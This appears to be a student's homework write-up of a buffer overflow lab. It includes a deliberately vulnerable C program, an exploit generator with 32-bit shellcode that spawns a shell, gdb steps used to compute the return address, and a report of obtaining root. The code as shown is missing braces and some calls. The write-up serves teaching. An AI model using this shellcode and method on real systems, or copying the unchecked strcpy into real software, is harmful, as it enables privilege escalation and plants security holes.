ch03 homework after class

Buffer overflow vulnerability experiment

Initial settings

  1. In Ubuntu and other Linux systems, address space randomization is used to randomize the initial addresses of the heap and stack, which makes it very difficult to guess the accurate memory address, which is the key to buffer overflow attack.

  2. In addition, in order to further prevent buffer overflow attacks and other attacks using shell programs, many shell programs automatically give up their privileges when called. Therefore, even if you can cheat a set uid program to call a shell, you can't maintain root permission in the shell. This protective measure is  / bin/bash   Implemented in.

  3. Enter the command to enter the 32-bit linux environment.


Vulnerability program


/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */

int bof(char *str)
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;

int main(int argc, char **argv)
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);

    printf("Returned Properly\n");
    return 1;



Attack program

/* exploit.c */
/* A program that creates a file containing code for launching shell*/

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80

void main(int argc, char **argv)
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //The first four bytes at the buffer specific offset overwrite the sellcode address  
    strcpy(buffer + 100, shellcode);   //Copy the shellcode to the buffer with the offset set to 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);

gdb debug attacker

Enter disass main



  The starting address of str is in esp, and the breakpoint is set at address 0x080484ee


Finally, get the address of str and calculate the address of shellcode


Now modify   exploit.c   File, will  \ x??\x??\x??\x??   Modify to calculated result  \ x14\xd0\xff\xff.





Obtained root privileges






Experimental principle

Buffer overflow is because the length of data exceeds the pre allocated space during program execution, resulting in covering the allocation area of other data, so as to execute unauthorized instructions, obtain information, obtain system privileges, and then carry out various illegal operations, resulting in program failure, system downtime, restart and other consequences. This vulnerability can be used by malicious users to change the flow control of the program and even execute arbitrary fragments of code. This vulnerability occurs because the data buffer and return address are temporarily closed. Overflow will cause the return address to be rewritten.

Posted on Sun, 31 Oct 2021 08:20:35 -0400 by webshifter